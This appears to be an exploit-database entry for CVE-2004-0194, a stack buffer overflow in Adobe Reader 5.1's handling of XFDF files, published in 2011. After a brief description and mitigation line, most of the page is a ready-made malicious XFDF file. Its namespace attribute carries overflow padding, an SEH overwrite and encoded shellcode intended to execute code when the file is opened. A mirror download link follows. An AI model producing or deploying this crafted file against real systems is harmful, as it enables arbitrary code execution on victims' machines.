Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)

vendor:

Acrobat Reader

by:

extraexploit@gmail.com

9.3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Acrobat Reader

Affected Version From: 5.1

Affected Version To: 5.1

Patch Exists: YES

Related CWE: CVE-2004-0194

CPE: a:adobe:acrobat_reader:5.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)

Adobe Reader 5.1 is vulnerable to a buffer overflow vulnerability when processing a specially crafted XFDF file. An attacker can exploit this vulnerability to execute arbitrary code in the context of the user running the vulnerable application. This vulnerability is due to a boundary error when processing the XFDF file. By supplying a specially crafted XFDF file, an attacker can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code.

Mitigation:

Upgrade to the latest version of Adobe Reader.

Source

Exploit-DB raw data:

# Exploit Title: Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)
# Google Dork: N/A or filtype ".xfdf"
# Date: 04/01/2011
# Author: extraexploit@gmail.com / http://extraexploit.blogspot.com
# Software Link: http://www.oldversion.com/download/acrobat51.exe
# Version: Acrobat (formerly Adobe) Reader 5.1
# Tested on: XP SP3
# CVE : cve-2004-0194
# http://extraexploit.blogspot.com/2011/07/old-bug-for-new-job-cve-2004-0194.html

<?xml version="1.0" encoding="ISO-8859-1"?>
<xfdf xmlns="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAz AAUO<81>.AAAAAAAAAAAAAAAAAAAAAAAAAAT]ÚÞÙuô_WYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLZHK9GpC0GpQpK9IuTqN2PdNkQBTpLKCbTLLKV2EDNkCBQ8VoOGRjTfVQIoEaIPNLGLQqQlC2TlGPO1ZoVmC1XGKRL0V2QGLKRrR0LKG2GLC1ZpNkG0QhK5IPQdPJEQN0RpNkCxR8LKChQ0EQZsXcGLPINkVTNkVaIFEaIoP1O0LlIQZoTMC1KwEhIpPuIdGsCMIhEkQmQ4T5IrChNkQHVDEQICRFNkTLRkNkQHGlGqKcLKTDLKVaZpMYCtVDQ4QKCkQqCiQJRqKOM0QHQOPZNkGbZKNfQMRJEQLMLENYGpC0C0RpPhEaLKROOwKON5OKL0OEI2RvRHI6MEOMOmIoZuElTFCLEZOpIkIpQeEUOKCwGcCBPoRJGpQCIoXURCPaPlRCTnQuPxPeEPAA" xml:space="preserve">
<fields>
<field name="Date of Birth"><value>01-01-1960</value></field>
<field name="Your Name"><value>Mr. Customer</value></field>
</fields>
<ids original="FEBDB19E0CD32274C16CE13DCF244AD2" modified="5BE74DD4F607B7409DC03D600E466E12"/>
</xfdf>

Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17488.xfdf (cve-2004-0194.xfdf.xfdf)